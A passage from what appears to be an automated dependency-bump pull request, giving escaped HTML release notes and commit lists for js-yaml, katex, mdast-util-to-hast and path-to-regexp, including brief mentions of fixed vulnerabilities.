href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `katex` from 0.16.18 to 0.16.44\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/KaTeX/KaTeX/releases\"\u003ekatex's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.16.44\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.43...v0.16.44\"\u003e0.16.44\u003c/a\u003e (2026-03-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eremove extra \\jot space at bottom of align/gather/etc. (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4184\"\u003e#4184\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/3870ee913e27fdde7bce244e4c6c5d63e2b28a62\"\u003e3870ee9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.16.43\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.42...v0.16.43\"\u003e0.16.43\u003c/a\u003e (2026-03-26)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse makeEm() consistently to truncate long CSS decimals (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4181\"\u003e#4181\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/0967dcc0278f20d4501a93f01c7343c70abb3fcd\"\u003e0967dcc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.16.42\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.41...v0.16.42\"\u003e0.16.42\u003c/a\u003e (2026-03-24)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\\underbracket and \\overbracket (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4147\"\u003e#4147\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/5be9abb0b4d687a2a196b8adf9b5b9deeb60f7bc\"\u003e5be9abb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.16.41\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.40...v0.16.41\"\u003e0.16.41\u003c/a\u003e (2026-03-24)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\\sout in text mode (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4173\"\u003e#4173\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/e748578b63e07ad30d5e404e60b04e5e794c0a5a\"\u003ee748578\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.16.40\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.39...v0.16.40\"\u003e0.16.40\u003c/a\u003e (2026-03-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecss:\u003c/strong\u003e specify position: relative for .katex (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4170\"\u003e#4170\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/020f0d89567d59229bac5fc8d8f5832a9508a85f\"\u003e020f0d8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.16.39\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.38...v0.16.39\"\u003e0.16.39\u003c/a\u003e (2026-03-19)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emiddle dot in text mode (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4169\"\u003e#4169\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/edb45b0b17c7b33349ce5142fe39156da05cb4d8\"\u003eedb45b0\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/3641\"\u003e#3641\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.16.38\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.37...v0.16.38\"\u003e0.16.38\u003c/a\u003e (2026-03-08)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/KaTeX/KaTeX/blob/main/CHANGELOG.md\"\u003ekatex's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.43...v0.16.44\"\u003e0.16.44\u003c/a\u003e (2026-03-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eremove extra \\jot space at bottom of align/gather/etc. (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4184\"\u003e#4184\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/3870ee913e27fdde7bce244e4c6c5d63e2b28a62\"\u003e3870ee9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.42...v0.16.43\"\u003e0.16.43\u003c/a\u003e (2026-03-26)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse makeEm() consistently to truncate long CSS decimals (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4181\"\u003e#4181\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/0967dcc0278f20d4501a93f01c7343c70abb3fcd\"\u003e0967dcc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.41...v0.16.42\"\u003e0.16.42\u003c/a\u003e (2026-03-24)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\\underbracket and \\overbracket (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4147\"\u003e#4147\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/5be9abb0b4d687a2a196b8adf9b5b9deeb60f7bc\"\u003e5be9abb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.40...v0.16.41\"\u003e0.16.41\u003c/a\u003e (2026-03-24)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\\sout in text mode (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4173\"\u003e#4173\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/e748578b63e07ad30d5e404e60b04e5e794c0a5a\"\u003ee748578\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.39...v0.16.40\"\u003e0.16.40\u003c/a\u003e (2026-03-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecss:\u003c/strong\u003e specify position: relative for .katex (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4170\"\u003e#4170\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/020f0d89567d59229bac5fc8d8f5832a9508a85f\"\u003e020f0d8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.38...v0.16.39\"\u003e0.16.39\u003c/a\u003e (2026-03-19)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emiddle dot in text mode (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4169\"\u003e#4169\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/edb45b0b17c7b33349ce5142fe39156da05cb4d8\"\u003eedb45b0\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/3641\"\u003e#3641\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.37...v0.16.38\"\u003e0.16.38\u003c/a\u003e (2026-03-08)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eaccent skew mixed with font specifiers (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4159\"\u003e#4159\u003c/a\u003e) (\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/aea33758d6c98896017007d0244885301773856a\"\u003eaea3375\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4121\"\u003e#4121\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.36...v0.16.37\"\u003e0.16.37\u003c/a\u003e (2026-03-06)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/0b7006e9af571d8256932bcdc739beb521a4769c\"\u003e\u003ccode\u003e0b7006e\u003c/code\u003e\u003c/a\u003e chore(release): 0.16.44 [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/3870ee913e27fdde7bce244e4c6c5d63e2b28a62\"\u003e\u003ccode\u003e3870ee9\u003c/code\u003e\u003c/a\u003e fix: remove extra \\jot space at bottom of align/gather/etc. (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4184\"\u003e#4184\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/e74702f48bba57006b84dc7412c10fdd991fa55f\"\u003e\u003ccode\u003ee74702f\u003c/code\u003e\u003c/a\u003e chore(release): 0.16.43 [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/0967dcc0278f20d4501a93f01c7343c70abb3fcd\"\u003e\u003ccode\u003e0967dcc\u003c/code\u003e\u003c/a\u003e fix: use makeEm() consistently to truncate long CSS decimals (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4181\"\u003e#4181\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/75d137bc030a11a50c2a078f5b538cb7c1c4cf25\"\u003e\u003ccode\u003e75d137b\u003c/code\u003e\u003c/a\u003e chore(release): 0.16.42 [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/5be9abb0b4d687a2a196b8adf9b5b9deeb60f7bc\"\u003e\u003ccode\u003e5be9abb\u003c/code\u003e\u003c/a\u003e feat: \\underbracket and \\overbracket (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4147\"\u003e#4147\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/4aa75c50c393195fc422ce351dda3368c45623af\"\u003e\u003ccode\u003e4aa75c5\u003c/code\u003e\u003c/a\u003e chore(release): 0.16.41 [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/e748578b63e07ad30d5e404e60b04e5e794c0a5a\"\u003e\u003ccode\u003ee748578\u003c/code\u003e\u003c/a\u003e fix: \\sout in text mode (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4173\"\u003e#4173\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/f3977a0fe9e886dec4f61998be3508acbb04e2b0\"\u003e\u003ccode\u003ef3977a0\u003c/code\u003e\u003c/a\u003e chore(deps): bump actions/checkout from 4 to 6 (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4177\"\u003e#4177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaTeX/KaTeX/commit/59115b4cbb974d2a0114b1cd7aac509dd4099c04\"\u003e\u003ccode\u003e59115b4\u003c/code\u003e\u003c/a\u003e chore(deps): bump github/codeql-action from 3 to 4 (\u003ca href=\"https://redirect.github.com/KaTeX/KaTeX/issues/4178\"\u003e#4178\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/KaTeX/KaTeX/compare/v0.16.18...v0.16.44\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `mdast-util-to-hast` from 13.2.0 to 13.2.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/releases\"\u003emdast-util-to-hast's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e13.2.1\u003c/h2\u003e\n\u003ch4\u003eFix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eab3a795 Fix support for spaces in class names\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eTypes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eefb5312 Refactor to use \u003ccode\u003e@import\u003c/code\u003es\u003c/li\u003e\n\u003cli\u003ea5bc210 Add declaration maps\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/compare/13.2.0...13.2.1\"\u003ehttps://github.com/syntax-tree/mdast-util-to-hast/compare/13.2.0...13.2.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/commit/174795b21f7757fffb54dd8d5fb4012f4751f791\"\u003e\u003ccode\u003e174795b\u003c/code\u003e\u003c/a\u003e 13.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/commit/3d05b3a715133df55689fe3753c2e47101315b4e\"\u003e\u003ccode\u003e3d05b3a\u003c/code\u003e\u003c/a\u003e Update Node in Actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/commit/ab3a79570a1afbfa7efef5d4a0cd9b5caafbc5d7\"\u003e\u003ccode\u003eab3a795\u003c/code\u003e\u003c/a\u003e Fix support for spaces in class names\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/commit/efb531231020055e0dab7b39a18d80b569d5b566\"\u003e\u003ccode\u003eefb5312\u003c/code\u003e\u003c/a\u003e Refactor to use \u003ccode\u003e@import\u003c/code\u003es\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/commit/a5bc210f1aa308e4c6141ac374893c9237fcd746\"\u003e\u003ccode\u003ea5bc210\u003c/code\u003e\u003c/a\u003e Add declaration maps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/commit/b54955d4e123b0167eac13646333c809bb8f301c\"\u003e\u003ccode\u003eb54955d\u003c/code\u003e\u003c/a\u003e Add \u003ccode\u003e.tsbuildinfo\u003c/code\u003e to \u003ccode\u003e.gitignore\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/syntax-tree/mdast-util-to-hast/compare/13.2.0...13.2.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 0.1.12 to 0.1.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.4.1\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRemove trie deduplication (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/431\"\u003e#431\u003c/a\u003e)  6bc8e84\n\u003cul\u003e\n\u003cli\u003eUsing a trie required non-greedy matching, which regressed wildcards in non-ending mode by matching them up until the first match. For example:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e/*foo\u003c/code\u003e with \u003ccode\u003e/a/b\u003c/code\u003e = \u003ccode\u003e/a\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e/*foo.html\u003c/code\u003ewith \u003ccode\u003e/a/b.html/c.html\u003c/code\u003e = \u003ccode\u003e/a/b.html\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eAllow backtrack handling to match itself (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/427\"\u003e#427\u003c/a\u003e)  5bcd30b\n\u003cul\u003e\n\u003cli\u003eWhen backtracking was introduced, it rejected matching things like \u003ccode\u003e/:\u0026quot;a\u0026quot;_:\u0026quot;b\u0026quot; against \u003c/code\u003e/foo__\u003ccode\u003e. This makes intuitive sense because the second parameter is not going to backtrack on \u003c/code\u003e\u003cem\u003e\u003ccode\u003eanymore, but it's somewhat unexpected since there's no reason it shouldn't match the second\u003c/code\u003e\u003c/em\u003e`.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v8.4.0...v8.4.1\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v8.4.0...v8.4.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e8.4.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eImportant\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-4926\"\u003eCVE-2026-4926\u003c/a\u003e (\u003ca href=\"https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-j3q9-mxjg-w52f\"\u003eGHSA-j3q9-mxjg-w52f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-4923\"\u003eCVE-2026-4923\u003c/a\u003e (\u003ca href=\"https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-27v5-c462-wpq7\"\u003eGHSA-27v5-c462-wpq7\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRestricts wildcard backtracking when using more than 1 in a path (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/pull/421\"\u003epillarjs/path-to-regexp#421\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDedupes regex prefixes (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/pull/422\"\u003epillarjs/path-to-regexp#422\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eThis will result in shorter regular expressions for some cases using optional groups\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eRejects large optional route combinations (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/pull/424\"\u003epillarjs/path-to-regexp#424\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eWhen using groups such as \u003ccode\u003e/users{/delete}\u003c/code\u003e it will restrict the number of generated combinations to \u0026lt; 256, equivalent to 8 top-level optional groups and unlikely to occur in a real world application, but avoids exploding the regex size for applications that accept user created routes\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.3.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd custom error class (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/398\"\u003e#398\u003c/a\u003e)  2a7f2a4\u003c/li\u003e\n\u003cli\u003eAllow plain objects for \u003ccode\u003eTokenData\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/391\"\u003e#391\u003c/a\u003e)  687a9bb\u003c/li\u003e\n\u003cli\u003eEscape text should escape backslash (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/390\"\u003e#390\u003c/a\u003e)  a4a8552\u003c/li\u003e\n\u003cli\u003eImproved error messages and stack size (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/363\"\u003e#363\u003c/a\u003e)  a6bdf40\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eOther\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eMinifying the parser\n\u003cul\u003e\n\u003cli\u003ePR (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/401\"\u003e#401\u003c/a\u003e)  9df2448\u003c/li\u003e\n\u003cli\u003ePR (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/395\"\u003e#395\u003c/a\u003e)  4a91505\u003c/li\u003e\n\u003cli\u003eShaving some bytes  d63f44b\u003c/li\u003e\n\u003cli\u003eRemove optional operator  973d15c\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v8.2.0...v8.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v8.2.0...v8.3.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/7f058760ae0867fdd75e5ed07d7096f782c1f752\"\u003e\u003ccode\u003e7f05876\u003c/code\u003e\u003c/a\u003e 8.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/6bc8e84677caa52de6db7b2b17a6729ec155b070\"\u003e\u003ccode\u003e6bc8e84\u003c/code\u003e\u003c/a\u003e Remove trie deduplication (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/431\"\u003e#431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/5bcd30b790fecfd4798521af28a57214996c4139\"\u003e\u003ccode\u003e5bcd30b\u003c/code\u003e\u003c/a\u003e Allow backtrack handling to match itself (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/427\"\u003e#427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/9f9c6c501f6d015db3df224d2479475d59cac0a5\"\u003e\u003ccode\u003e9f9c6c5\u003c/code\u003e\u003c/a\u003e Add parsing to benchmarks (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/9fd31e0cde4f35b5f15f1676eabe3484618038ad\"\u003e\u003ccode\u003e9fd31e0\u003c/code\u003e\u003c/a\u003e Add \u003ccode\u003etrailing: false\u003c/code\u003e tests (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/428\"\u003e#428\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/1e796b51fd86c12cf23847523f86f7a7c7a134be\"\u003e\u003ccode\u003e1e796b5\u003c/code\u003e\u003c/a\u003e Use \u003ccode\u003eparam\u003c/code\u003e type in README (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/429\"\u003e#429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/34cb451ddaeea4783a2fe60579ffb3e4ccfc73a7\"\u003e\u003ccode\u003e34cb451\u003c/code\u003e\u003c/a\u003e 8.4.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/22a967901afc8b2b42eefe456faa7b6773dcc415\"\u003e\u003ccode\u003e22a9679\u003c/code\u003e\u003c/a\u003e Reject large optional route combinations (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/424\"\u003e#424\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 